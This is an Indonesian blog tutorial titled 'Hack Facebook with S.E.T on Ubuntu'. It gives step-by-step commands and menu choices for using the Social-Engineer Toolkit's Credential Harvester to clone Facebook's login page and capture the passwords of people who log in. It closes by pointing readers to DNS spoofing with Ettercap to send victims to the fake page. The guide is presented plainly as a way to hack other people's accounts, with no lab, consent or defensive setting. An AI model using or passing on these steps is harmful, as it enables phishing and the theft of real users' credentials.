Hack Facebook dengan S.E.T di Ubuntu

Ok langsung saja kita mulai

Download S.E.T dulu
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

Install dengan perintah

cd /set 

./setup.py install

     Bila tidak bisa menginstall S.E.T tambahkan repository BackTrack di Ubuntu kalo belum tau caranya baca artikel saya sebelumnya Repository BackTrack di Ubuntu

Sekarang saatnya memulai Hacking

1. Matikan dulu Apache anda dengan perintah

   service apache2 stop
   atau
   sudo /etc/init.d/apache2 stop

    Untuk memulai kembali masukan perintah

   service apache2 start

   Untuk melihat status apache masukan perintah
   sevice apahe2 status

2.Buka S.E.T dengan perintah

   cd /pentest/exploits/set

   ./set

3.pilih Social-Engineering Attacks dengan cara tekan angka 1 (enter)

4.pilih Website Attack Vectors tekan 2 (enter)

5.pilih Credential Harvester Attack Method tekan 3 (enter)

6.pilih Web Templates tekan 1 (enter)

7.IP address for the POST back in Harvester/Tabnabbing: 192.168.1.34 (IP address kita)


     Jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook,gmail,google,twitter dan Java required contohnya.

8. tinggal pilih templatenya, karena ini tutorial hack facebook, pilih 4


[*] Cloning the website: http://www.facebook.com

[*] This could take a little bit...


The best way to use this attack is if username and password form

fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message. [*]



9. Press {return} to continue. tekan enter.


[*] Social-Engineer Toolkit Credential Harvester Attack

[*] Credential Harvester is running on port 80

[*] Information will be displayed to you as it arrives below:


     Kalau sudah muncul kalimat seperti yang di atas berarti S.E.T telah berjalan jangan di tutup terminalnya tunggu aja sampai ada orang yang login di fake Facebook yang udah kita buat tadi.
Untuk menutup SET tekan ctrl+C

username dan password akan muncul di bawah kalimat tersebut.     Agar orang-orang kalau membuka facebook di alihkan ke fake Facebook gunakan DSN spoofing.
Belum bisa DNS spoofing baca artikel DNS spoofing dengan Ettercap